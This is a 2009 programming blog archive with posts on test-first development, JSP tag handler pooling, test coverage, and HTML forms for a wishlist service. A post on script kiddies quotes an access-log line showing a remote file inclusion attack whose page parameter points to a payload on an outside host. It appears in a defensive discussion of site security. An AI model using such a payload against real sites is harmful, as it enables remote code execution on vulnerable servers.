Friday, October 30, 2009

Tests are the Story

I have a recurring discussion with my friend James, regarding test-first development. He believes is that writing tests first is like writing an outline for an academic paper or novel. And sometimes you don't know where the story is going to end up when you start writing. In the past, I've always countered that with the liberal-arts-major argument that you should know what you're going to say before you say it.

However, he makes a good point. Even when you have a goal in mind, sometimes the path to that goal takes unexpected twists and turns. If you write your tests presuming a specific order of steps, they'll become obsolete when the real story doesn't follow the outline.

So here's a different response: the tests are the story. The production code is merely a footnote.

The ultimate goal is satisfied users, and the tests are development standins for those users (even if the "user" is another piece of code). As you write your tests, you should be thinking not of the needs of your mainline code, but the needs of those users. As your understanding of those users changes, your tests will change. Some will be deleted.

You could call this wasted effort, but that's misleading. It was necessary effort, because you didn't have a perfect understanding of the users' needs. The real question is: was it better to explore the plot using tests, or to simply write some mainline code and hope that it did what it should?

Tuesday, October 27, 2009

Tag Reuse in JSPs

One thing that's always puzzled me about JSP taglibs is the mechanics of tag reuse — what happens when you invoke the same tag twice on a page. The Tag JavaDoc says the following:

After the doEndTag invocation, the tag handler is available for further invocations (and it is expected to have retained its properties).

This statement sent up a bunch of red flags when I first read it. And it's done the same for others: I've seen tag implementations that explicitly reset all attributes in doEndTag(). But if this was the required implementation, I'd expect to see it mentioned in the J2EE tutorial or sample code, and it isn't.

Moreover, the description makes no sense: you can't build a software system on components that will render arbitrary values depending on where they're invoked. My first hint came from examining the Java code generated by Tomcat:

private org.apache.jasper.runtime.TagHandlerPool _jspx_tagPool_prodList_form_visible_userId_operation_name_listName_htmlId_format;
private org.apache.jasper.runtime.TagHandlerPool _jspx_tagPool_prodList_form_visible_userId_timeout_operation_name_listName_htmlId_format;

Those are pretty long names. And interestingly, they include the parameters used in the tags. And they're different. That led me back to the JSP specifications, with a more focused search. And on page 2-51, we see the rules:

The JSP container may reuse classic tag handler instances for multiple occurrences of the corresponding custom action, in the same page or in different pages, but only if the same set of attributes are used for all occurrences.

I'd love to know the rationale behind this — and whether it was intentional or a “retro-specification” to cover decisions made in the reference implementation (Tomcat). To me, it seems like premature optimization: assume that it's expensive to instantiate a tag handler or set its attributes, so go to extra effort to pool those instances. If, instead, the specification required handlers to be explicitly instantiated per use it would drive developers toward lightweight handlers that collaborate with external services. Which in my opinion is a far better way to write them.

Monday, October 26, 2009

Unease

If you really don't care you aren't going to know it's wrong. The thought'll never occur to you. The act of pronouncing it wrong's a form of caring.

Zen and the Art of Motorcycle Maintenance is a book that you'll either love or hate. To some, it is a bombastic restatement of ideas that everyone already knows. To others, a lightweight gateway to heavyweight philosophy. And then there are people who believe it changed their life. I can't say that I'm one of the latter, but the book resonates with me on many levels, and I've reread it every few years since I was 15.

I recently paraphrased the above quote in a presentation on testing and coverage. The main point of my presentation was that 100% coverage does not guarantee sufficient testing; an audience member asked the obvious question “then how do you know that you've written enough tests?” My answer can be paraphrased as “you've written enough tests when you feel comfortable that you've written enough.”

Not a terribly good answer, to be honest. It did, however, set up my closing slide, which pointed out that you need committed, test-infected developers to get good tests. If you don't have that, you might as well buy a tool that throws random data at your code. But how does one arrive at the level of caring needed to write good tests? And is it inborn, or something that comes from experience?

I've been thinking about these questions this morning, because I'm refactoring some code and am left with what I consider an ugly method call: if called in one situation I want it to throw an exception, if called in another I want it to fail silently and return null. I've been puzzling over whether I really need to break the method into two parts, and also whether I should think more about another quote from Pirsig:

What's more common is that you feel unpeaceful even if it's right

Sometimes, perhaps, good enough is good enough.

Monday, October 12, 2009

Building a Wishlist Service: HTML Forms

Back to the wishlist service, and it's time to look at the client side. In particular, the mechanism that the client uses to submit requests. XML on the browser is, quite simply, a pain in the neck. While E4X is supposed to be a standard, support for it is limited. Microsoft, as usual, provides its own alternative. Since XML is a text format, you could always construct strings yourself, but there are enough quirks that this often results in unparseable XML.

Against the pain of XML, we have HTML forms. They've been around forever, work the same way in all browsers, and don't require JavaScript. They're not, however, very “Web 2.0 friendly”: when you submit a form, it reloads the entire page. Filling this gap, the popular JavaScript libraries provide methods to serialize form contents and turn them into an AJAX request. As long as you're sending simple data (ie, no file uploads), these libraries get the job done.

To simplify form creation, I created some JSP tags. This provides several benefits, not least of which is that I can specify required parameters such as the user ID and wishlist name. I also get to use introspection and intelligent enums to build the form: you specify an “Operation” value in the JSP, and the tag implementation can figure out whether it needs a GET or a POST, what parameters need to go on the URL, and what fields need to go in the body.

One of the more interesting “learning experiences” was the difference between GET and POST forms. With the former, the browser will throw away any query string provided in the form's action attribute, and build a new string from the form's fields. With the latter, the query string is passed untouched. In my initial implementation I punted, and simply emitted everything as input: the server didn't care, because getParameter(), doesn't differentiate between URL and body. This offended my sense of aesthetics however, so I refactored the code into a class that would manage both the action URL and a set of body fields. Doing so had the side benefit that I could write out-of-container unit tests for all of the form generation code.

The other problem came from separating the form's markup from the JavaScript that makes it work. This is current “best practice,” and I understand the rationale behind it, but it makes me uncomfortable. In fact, it makes me think that we're throwing away lessons learned about packaging over the last 30 years. But that's another post.

Saturday, October 3, 2009

Script Kiddies

As you might have guessed from my earlier posting about del.icio.us, I pay attention to the access logs for my main website. It's interesting to see what pages are getting traffic, and where that traffic is coming from. This month, of course, the article on Java Reference Objects was far and away the winner, with almost exactly 50% of the hits. However, nearly 25% of these hits came from Google searches — which is not surprising, since it's on the first page when you Google “java reference objects”. Unfortunately for the world of software, a lot of the query strings indicate deep misunderstandings of how Java works. And then there are the strange ones: I have yet to figure out what “sensitive objects” could be.

What's really interesting about my access logs, however — and why I look at them rather than using a web beacon — are the attacks on my site. I have a homegrown page management system, which I think is fairly solid, but ever since I saw the first attack I've paid attention to them. Here's a a typical log entry, that appears to be coming from a home computer:

68.217.2.156 - - [05/Sep/2009:16:38:07 -0700] "GET /index.php?page=http://64.15.67.17/~calebsbi/logo.jpg? HTTP/1.1"

If my pages blindly took the page parameter value and passed it to include, this attack would work. And if you Google for “calebsbi” you'll see over 30,000 hits, indicating that there are a lot of people who blindly pass parameters to include. Other attacks try to read the password file, and one enterprising person wrote a script that sent himself email (to a Google address, which I promptly reported).

What's amazing to me is the amount of effort these people expend. Oh, sure, I expect that the actual hits come from a bot, but someone has gone to the trouble to figure out that my site is driven by the page parameter: I don't get hits with include= or sql=. And it's not always a botnet doing the hits: one night a person came to my site from Twitter, and spent over an hour trying different URL combinations. He (I'll assume) actually managed to uncover portions of my site's directory tree (the programming examples use a simple directory tree, which has since been “capped” with a redirect), and started trying URLs that included functions from my page fragments.

So far, my site hasn't been hacked, and I think a large part of the reason is that the attackers have been “script kiddies,” trying attacks that they don't really understand. The person who walked my programming directories, for example, kept putting needless parameters on the URLs. And if you try to retrieve “logo.jpg”, you'll find that there's no longer any webserver at that address. Yet the attacks keep coming, so I keep looking to see that my site code behaves as expected.